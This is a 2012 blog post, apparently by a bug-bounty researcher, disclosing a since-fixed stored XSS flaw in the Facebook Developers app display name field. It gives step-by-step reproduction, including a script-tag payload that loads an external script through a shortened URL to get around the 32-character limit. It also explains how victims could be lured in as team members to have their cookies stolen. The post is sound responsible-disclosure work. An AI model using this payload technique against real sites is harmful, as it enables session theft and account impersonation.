Saturday, October 13, 2012

Stored XSS on Facebook Developers

A month ago, I discovered a stored XSS vulnerability on the Facebook Developers website. Even though a developer's page can be only accessed by its application developers, an attacker could easily grant other users permission to view the page by inviting them to become team members. After the users become team members, the attacker would be able to exploit the vulnerability and steal the users' cookies to spoof their identities. The attacker would also be able to change the content displayed on the developer's page.

The vulnerability was in the display name field of the application. The following steps were taken to produce the XSS on my Firefox 15.0 browser:
  1. I created a malicious script, a file containing "alert(/XSSed/)", and hosted it on my server. The URL of the file became http://yujikosuga.com/xss.js
  2. I shortened the URL to http://goo.gl/p3skt because the maximum character length of the display name field is limited to 32 characters.
  3. I created a new Facebook application on the Developers website and set its display name to "<script src=//goo.gl/p3skt/><!--".
  4. I clicked on the Open Graph tab in the left menu, entered "xss" into the input fields and proceeded to the next page.
  5. I opened the Action Types section.
  6. An alert popup showing "/XSSed/" was displayed on my browser--the script was activated.
I then created a test user account and invited it to take on an admin role for the application. The test user account represented an unsuspecting victim. By clicking on just one button to accept the role, the test user gained permission to access the malicious page. I was able to confirm that the script was activated on that account as well.

This vulnerability was reported on August 30 and fixed on September 5 as part of Facebook's Security Bug Bounty Program.